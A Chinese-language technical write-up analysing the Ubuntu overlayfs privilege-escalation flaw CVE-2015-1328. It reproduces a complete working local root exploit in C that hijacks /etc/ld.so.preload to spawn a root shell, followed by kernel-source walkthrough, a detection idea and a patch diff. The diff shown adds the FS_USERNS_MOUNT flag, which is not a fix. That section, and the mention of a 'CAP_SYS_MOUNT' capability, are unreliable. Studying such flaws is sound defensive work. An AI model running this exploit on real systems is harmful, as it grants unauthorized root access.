catalog
0. 引言 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix
0. 引言
新技術、高效能技術的不斷髮展,越來越提升了作業系統的能力,而近幾年出現的虛擬化技術,包括overlayfs虛擬層疊檔案系統技術,則為docker這樣的虛擬化方案提供了越來越強大的技術支撐,但是也同時帶來了很多的安全問題
拋開傳統的overflow溢位型漏洞不說,還有另一類漏洞屬於"特性型"的漏洞,黑客利用系統原生提供的"功能",加上一些特殊設計的"使用組合方式",以此實現了非預期的操作結果,甚至root
這也再次告訴我們,在系統層和黑客進行攻防,就需要比黑客更加深刻理解系統本身的特性,以及在極端條件下它們的組合方式,因為這些組合方式很有可能能夠轉化為攻擊向量
1. Description
Philip Pettersson discovered a privilege escalation when using overlayfs mounts inside of user namespaces. A local user could exploit this flaw to gain administrative privileges on the system
使用預設配置的ubuntu.所有版本存在該cve-2015-1328漏洞,允許本地root特權提升,當在upper檔案系統目錄中建立新檔案時,overlayfs檔案系統並不能恰當檢查檔案許可權
該漏洞能被某非特權程式利用,此程式在核心中(帶有CONFIG_USER_NS=y、且其位置的overlayfs帶有FS_USERNS_MOUNT標誌),可讓掛載的overlayfs在非特權的目錄中掛載名稱空間,
這是ubuntu12.04, 14.04, 14.10, and 15.04 [1].的預設配置
0x1: Overlay Filesystem
Relevant Link:
https://security-tracker.debian.org/tracker/CVE-2015-1328 http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html http://www.freebuf.com/news/70615.html http://seclists.org/oss-sec/2015/q2/717 https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt http://www.cnblogs.com/LittleHann/p/4083943.html //搜尋:0x4: overlayfs
2. Effected Scope
Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
3. Exploit Analysis
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <sys/types.h> #include <signal.h> #include <fcntl.h> #include <string.h> #include <linux/sched.h> #define LIB "#include <unistd.h>" "uid_t(*_real_getuid) (void);" "char path[128];" "uid_t getuid(void)" "{" "_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");" "readlink(\"/proc/self/exe\", (char *) &path, 128);" "if(geteuid() == 0 && !strcmp(path, \"/bin/su\"))" "{\nunlink(\"/etc/ld.so.preload\");" "unlink(\"/tmp/ofs-lib.so\");" "setresuid(0, 0, 0);" "setresgid(0, 0, 0);" "execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);" "}" "return _real_getuid();" "}" static char child_stack[1024*1024]; static int child_exec(void *stuff) { char *file; system("rm -rf /tmp/ns_sploit"); mkdir("/tmp/ns_sploit", 0777); mkdir("/tmp/ns_sploit/work", 0777); mkdir("/tmp/ns_sploit/upper",0777); mkdir("/tmp/ns_sploit/o",0777); fprintf(stderr,"mount #1\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); exit(-1); } file = ".access"; chmod("/tmp/ns_sploit/work/work",0777); } else file = "ns_last_pid"; chdir("/tmp/ns_sploit/o"); rename(file,"ld.so.preload"); chdir("/"); umount("/tmp/ns_sploit/o"); fprintf(stderr,"mount #2\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { exit(-1); } chmod("/tmp/ns_sploit/work/work",0777); } chmod("/tmp/ns_sploit/o/ld.so.preload",0777); umount("/tmp/ns_sploit/o"); } int main(int argc, char **argv) { int status, fd, lib; pid_t wrapper, init; int clone_flags = CLONE_NEWNS | SIGCHLD; fprintf(stderr,"spawning threads\n"); //建立子程式 if((wrapper = fork()) == 0) { //將子程式移動到新名稱空間,和父程式分離 if(unshare(CLONE_NEWUSER) != 0) fprintf(stderr, "failed to create new user namespace\n"); //子程式繼續建立子程式 if((init = fork()) == 0) { //新的子程式從新的函式入口點開始執行,相當於execve了一個新程式,新的子程式繼續存在於一個新的名稱空間中 pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); if(pid < 0) { fprintf(stderr, "failed to create new mount namespace\n"); exit(-1); } waitpid(pid, &status, 0); } waitpid(init, &status, 0); return 0; } usleep(300000); wait(NULL); fprintf(stderr,"child threads done\n"); fd = open("/etc/ld.so.preload",O_WRONLY); if(fd == -1) { fprintf(stderr,"exploit failed\n"); exit(-1); } fprintf(stderr,"/etc/ld.so.preload created\n"); fprintf(stderr,"creating shared library\n"); lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); write(lib,LIB,strlen(LIB)); close(lib); lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); if(lib != 0) { fprintf(stderr,"couldn't create dynamic library\n"); exit(-1); } write(fd,"/tmp/ofs-lib.so\n",16); close(fd); system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); execl("/bin/su","su",NULL); }
Relevant Link:
http://cxsecurity.com/issue/WLB-2015060081 https://www.exploit-db.com/exploits/37292/
4. Principle Of Vulnerability
我們以POC中使用都的API呼叫和特性為線索,逐步討論overlayfs的相關"特性",以及這些特性是如何最終形成一條攻擊向量的
0x1: 建立子程式時傳入CLONE_NEWNS
注意到POC中的這幾行程式碼,涉及到了shared標誌位、CLONE_NEWNS標誌位
.. //建立子程式 if((wrapper = fork()) == 0) { //將子程式移動到新名稱空間,和父程式分離 if(unshare(CLONE_NEWUSER) != 0) fprintf(stderr, "failed to create new user namespace\n"); //子程式繼續建立子程式 if((init = fork()) == 0) { //新的子程式從新的函式入口點開始執行,相當於execve了一個新程式,新的子程式繼續存在於一個新的名稱空間中 pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); ..
/source/kernel/fork.c
/* * unshare allows a process to 'unshare' part of the process * context which was originally shared using clone. copy_* * functions used by do_fork() cannot be used here directly * because they modify an inactive task_struct that is being * constructed. Here we are modifying the current, active, * task_struct. */ SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags) { int err = 0; struct fs_struct *fs, *new_fs = NULL; struct sighand_struct *new_sigh = NULL; struct mm_struct *mm, *new_mm = NULL, *active_mm = NULL; struct files_struct *fd, *new_fd = NULL; struct nsproxy *new_nsproxy = NULL; int do_sysvsem = 0; check_unshare_flags(&unshare_flags); /* Return -EINVAL for all unsupported flags */ err = -EINVAL; if (unshare_flags & ~(CLONE_THREAD|CLONE_FS|CLONE_NEWNS|CLONE_SIGHAND| CLONE_VM|CLONE_FILES|CLONE_SYSVSEM| CLONE_NEWUTS|CLONE_NEWIPC|CLONE_NEWNET)) goto bad_unshare_out; /* * CLONE_NEWIPC must also detach from the undolist: after switching * to a new ipc namespace, the semaphore arrays from the old * namespace are unreachable. */ if (unshare_flags & (CLONE_NEWIPC|CLONE_SYSVSEM)) do_sysvsem = 1; if ((err = unshare_thread(unshare_flags))) goto bad_unshare_out; if ((err = unshare_fs(unshare_flags, &new_fs))) goto bad_unshare_cleanup_thread; if ((err = unshare_sighand(unshare_flags, &new_sigh))) goto bad_unshare_cleanup_fs; if ((err = unshare_vm(unshare_flags, &new_mm))) goto bad_unshare_cleanup_sigh; if ((err = unshare_fd(unshare_flags, &new_fd))) goto bad_unshare_cleanup_vm; if ((err = unshare_nsproxy_namespaces(unshare_flags, &new_nsproxy, new_fs))) goto bad_unshare_cleanup_fd; if (new_fs || new_mm || new_fd || do_sysvsem || new_nsproxy) { if (do_sysvsem) { /* * CLONE_SYSVSEM is equivalent to sys_exit(). */ exit_sem(current); } if (new_nsproxy) { switch_task_namespaces(current, new_nsproxy); new_nsproxy = NULL; } task_lock(current); if (new_fs) { fs = current->fs; write_lock(&fs->lock); current->fs = new_fs; if (--fs->users) new_fs = NULL; else new_fs = fs; write_unlock(&fs->lock); } if (new_mm) { mm = current->mm; active_mm = current->active_mm; current->mm = new_mm; current->active_mm = new_mm; activate_mm(active_mm, new_mm); new_mm = mm; } if (new_fd) { fd = current->files; current->files = new_fd; new_fd = fd; } task_unlock(current); } if (new_nsproxy) put_nsproxy(new_nsproxy); bad_unshare_cleanup_fd: if (new_fd) put_files_struct(new_fd); bad_unshare_cleanup_vm: if (new_mm) mmput(new_mm); bad_unshare_cleanup_sigh: if (new_sigh) if (atomic_dec_and_test(&new_sigh->count)) kmem_cache_free(sighand_cachep, new_sigh); bad_unshare_cleanup_fs: if (new_fs) free_fs_struct(new_fs); bad_unshare_cleanup_thread: bad_unshare_out: return err; }
/source/kernel/fork.c
static struct task_struct *copy_process(unsigned long clone_flags, unsigned long stack_start, struct pt_regs *regs, unsigned long stack_size, int __user *child_tidptr, struct pid *pid, int trace) { int retval; struct task_struct *p; int cgroup_callbacks_done = 0; /* 1. 對傳入的clone_flag進行檢查 */ if ((clone_flags & (CLONE_NEWNS|CLONE_FS)) == (CLONE_NEWNS|CLONE_FS)) return ERR_PTR(-EINVAL); if ((clone_flags & CLONE_THREAD) && !(clone_flags & CLONE_SIGHAND)) return ERR_PTR(-EINVAL); if ((clone_flags & CLONE_SIGHAND) && !(clone_flags & CLONE_VM)) return ERR_PTR(-EINVAL); if ((clone_flags & CLONE_PARENT) && current->signal->flags & SIGNAL_UNKILLABLE) return ERR_PTR(-EINVAL); .. /* copy all the process information 根據clone_flags複製父程式的資源到子程式,對於clone_flags指定共享的資源,父子程式間共享這些資源,僅僅設定子程式的相關指標,並增加資源資料結構的引用計數 */ if ((retval = copy_semundo(clone_flags, p))) goto bad_fork_cleanup_audit; if ((retval = copy_files(clone_flags, p))) goto bad_fork_cleanup_semundo; if ((retval = copy_fs(clone_flags, p))) goto bad_fork_cleanup_files; if ((retval = copy_sighand(clone_flags, p))) goto bad_fork_cleanup_fs; if ((retval = copy_signal(clone_flags, p))) goto bad_fork_cleanup_sighand; if ((retval = copy_mm(clone_flags, p))) goto bad_fork_cleanup_signal; //複製名稱空間 if ((retval = copy_namespaces(clone_flags, p))) ..
/source/kernel/nsproxy.c
/* * called from clone. This now handles copy for nsproxy and all * namespaces therein. */ int copy_namespaces(unsigned long flags, struct task_struct *tsk) { struct nsproxy *old_ns = tsk->nsproxy; struct nsproxy *new_ns; int err = 0; if (!old_ns) return 0; get_nsproxy(old_ns); //檢查flag if (!(flags & (CLONE_NEWNS | CLONE_NEWUTS | CLONE_NEWIPC | CLONE_NEWPID | CLONE_NEWNET))) return 0; if (!capable(CAP_SYS_ADMIN)) { err = -EPERM; goto out; } /* * CLONE_NEWIPC must detach from the undolist: after switching * to a new ipc namespace, the semaphore arrays from the old * namespace are unreachable. In clone parlance, CLONE_SYSVSEM * means share undolist with parent, so we must forbid using * it along with CLONE_NEWIPC. */ if ((flags & CLONE_NEWIPC) && (flags & CLONE_SYSVSEM)) { err = -EINVAL; goto out; } //建立新的namespace new_ns = create_new_namespaces(flags, tsk, tsk->fs); if (IS_ERR(new_ns)) { err = PTR_ERR(new_ns); goto out; } tsk->nsproxy = new_ns; out: put_nsproxy(old_ns); return err; }
/source/kernel/nsproxy.c
/* * Create new nsproxy and all of its the associated namespaces. * Return the newly created nsproxy. Do not attach this to the task, * leave it to the caller to do proper locking and attach it to task. */ static struct nsproxy *create_new_namespaces(unsigned long flags, struct task_struct *tsk, struct fs_struct *new_fs) { struct nsproxy *new_nsp; int err; new_nsp = create_nsproxy(); if (!new_nsp) return ERR_PTR(-ENOMEM); //建立新的掛載點名稱空間 new_nsp->mnt_ns = copy_mnt_ns(flags, tsk->nsproxy->mnt_ns, new_fs); if (IS_ERR(new_nsp->mnt_ns)) { err = PTR_ERR(new_nsp->mnt_ns); goto out_ns; } ..
/source/fs/namespace.c
struct mnt_namespace *copy_mnt_ns(unsigned long flags, struct mnt_namespace *ns, struct fs_struct *new_fs) { struct mnt_namespace *new_ns; BUG_ON(!ns); get_mnt_ns(ns); if (!(flags & CLONE_NEWNS)) return ns; //複製掛載名稱空間 new_ns = dup_mnt_ns(ns, new_fs); put_mnt_ns(ns); return new_ns; }
/source/fs/namespace.c
/* * Allocate a new namespace structure and populate it with contents * copied from the namespace of the passed in task structure. */ static struct mnt_namespace *dup_mnt_ns(struct mnt_namespace *mnt_ns, struct fs_struct *fs) { struct mnt_namespace *new_ns; struct vfsmount *rootmnt = NULL, *pwdmnt = NULL; struct vfsmount *p, *q; new_ns = alloc_mnt_ns(); if (IS_ERR(new_ns)) return new_ns; down_write(&namespace_sem); /* First pass: copy the tree topology */ new_ns->root = copy_tree(mnt_ns->root, mnt_ns->root->mnt_root, CL_COPY_ALL | CL_EXPIRE); if (!new_ns->root) { up_write(&namespace_sem); kfree(new_ns); return ERR_PTR(-ENOMEM); } spin_lock(&vfsmount_lock); list_add_tail(&new_ns->list, &new_ns->root->mnt_list); spin_unlock(&vfsmount_lock); /* * Second pass: switch the tsk->fs->* elements and mark new vfsmounts * as belonging to new namespace. We have already acquired a private * fs_struct, so tsk->fs->lock is not needed. */ p = mnt_ns->root; q = new_ns->root; while (p) { q->mnt_ns = new_ns; if (fs) { if (p == fs->root.mnt) { rootmnt = p; fs->root.mnt = mntget(q); } if (p == fs->pwd.mnt) { pwdmnt = p; fs->pwd.mnt = mntget(q); } } p = next_mnt(p, mnt_ns->root); q = next_mnt(q, new_ns->root); } up_write(&namespace_sem); if (rootmnt) mntput(rootmnt); if (pwdmnt) mntput(pwdmnt); return new_ns; }
因為overlayfs mount需要CAP_SYS_MOUNT能力,因此需要新建一個NEWUSER的namespace,這樣就有CAP_SYS_MOUNT了(即使這樣也需要overlayfs在編譯的時候開啟了FS_USERNS_MOUNT)
0x2: 兩次overlayfs mount/unount
POC先建立了使用者exploit的目錄和檔案
system("rm -rf /tmp/ns_sploit"); mkdir("/tmp/ns_sploit", 0777); mkdir("/tmp/ns_sploit/work", 0777); mkdir("/tmp/ns_sploit/upper",0777); mkdir("/tmp/ns_sploit/o",0777);
1. 第一次mount
//將lowerdir(/proc/sys/kernel)、upperdir(/tmp/ns_sploit/upper)作為overlayfs掛載到/tmp/ns_sploit/o中 if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) //將lowerdir(l/sys/kernel/security/apparmor)、upperdir(/tmp/ns_sploit/upper)、workdir(/tmp/ns_sploit/work)作為overlayfs掛載到/tmp/ns_sploit/o中
至此,已經將/proc/sys/kernel、/sys/kernel/security/apparmor作為lowerdir,全部掛載到了/tmp/ns_sploit/o中
1. 第一次lowerdir=/proc/sys/kernel upperdir=/tmp/ns_sploit/o 2. 然後rename(file,"ld.so.preload"); 3. 這時候會從lowerdir複製一份file到upperdir,然後再重新命名為ld.so.preload,並且這個檔案的屬主是root 4. 然後umount
第一次unmount
umount("/tmp/ns_sploit/o");
2. 第二次mount
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
第二次mount是在第一次mount的基礎上進行的
1. 第一次mount已經實現了在/tmp/ns_sploit/o中建立了ld.so.preload檔案 2. 第二次mount lowerdir=/tmp/ns_sploit/o upperdir=/etc 3. 然後chmod("/tmp/ns_sploit/o/ld.so.preload", 0777),因為overlayfs的底層實現是合併兩個資料夾,rename本質是寫檔案操作,寫lowerdir的時候會先複製一份到upperdir再修改 4. 這就導致把/tmp/ns_sploit/o/ld.so.preload複製到了/etc目錄,並且許可權為0777 5. 同時這裡的另一個關鍵漏洞是複製過程的許可權判斷有問題,overlayfs檢查的不是當前使用者能不能寫upperdir,而是檢測被寫的檔案的屬主能不能寫upperdir,許可權判斷錯誤實際上是在第二次mount中被利用的,從某種程度上來說,這就導致的越權寫
做完了這一步之後,黑客獲取到的能力有
1. 黑客有能力讀取/etc/ld.so.preload檔案內容,因為overlayfs掛載的關係 2. 因為overlayfs檔案讀寫許可權檢查的漏洞,導致黑客有能力可以修改/etc/ld.so.preload檔案內容
3. 使用ld.so.preload ring3劫持技術
.. //開啟/etc/ld.so.preload檔案 fd = open("/etc/ld.so.preload",O_WRONLY); .. //編譯生成用於函式劫持的hook so lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); write(lib,LIB,strlen(LIB)); close(lib); lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); .. //修改/etc/ld.so.preload,加入hook so write(fd,"/tmp/ofs-lib.so\n",16); close(fd); system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); ..
hook so
/* 劫持了getuid函式,並在hook func中執行 setresgid(0, 0, 0); execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL); 直接獲取root shell會話 */ #define LIB "#include <unistd.h>" "uid_t(*_real_getuid) (void);" "char path[128];" "uid_t getuid(void)" "{" "_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");" "readlink(\"/proc/self/exe\", (char *) &path, 128);" "if(geteuid() == 0 && !strcmp(path, \"/bin/su\"))" "{\nunlink(\"/etc/ld.so.preload\");" "unlink(\"/tmp/ofs-lib.so\");" "setresuid(0, 0, 0);" "setresgid(0, 0, 0);" "execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);" "}" "return _real_getuid();" "}"
對整個入侵向量進行一下梳理
1. overlayfs的掛載特性(lowerdir、upperdir)是系統本身的特性,並不能嚴格意義上算是漏洞 2. 黑客通過兩次的mount/unmount,實際上間接獲得了對/etc/ld.so.preload的訪問許可權 3. 問題的關鍵在於overlayfs對upperdir檔案寫的許可權檢查邏輯有問題,overlayfs檢查的不是當前使用者能不能寫upperdir,而是檢測被寫的檔案的屬主能不能寫upperdir,這導致了黑客可以通過修改lowerdir來實現對upperdir檔案的越權寫 4. overlayfs實現了類似overflow的準備工作,真正發揮作用的explicit是Linux上傳統的攻擊技術: LD_PRELOAD/ld.so.reload劫持技術
Relevant Link:
https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt http://www.cnblogs.com/LittleHann/p/4083943.html //搜尋:0x4: overlayfs
5. Patch Fix
0x1: 檢測方案
檢查/etc/ld.so.preload中是否包含有惡意內容,如果發現,則認為是可疑事件
0x2: 修復方案
diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
@@ -816,6 +816,7 @@ static struct file_system_type ovl_fs_type = { .name = "overlay", .mount = ovl_mount, .kill_sb = kill_anon_super, + .fs_flags = FS_USERNS_MOUNT, }; MODULE_ALIAS_FS("overlay");
0x3: Hotpatch方案
1. poc特徵: su程式建立子程式/bin/sh,這在正常的strace su跟蹤中是不應該出現的 2. 可以在程式管控中針對su建立子程式建立防禦規則
Relevant Link:
https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549
Copyright (c) 2015 Little5ann All rights reserved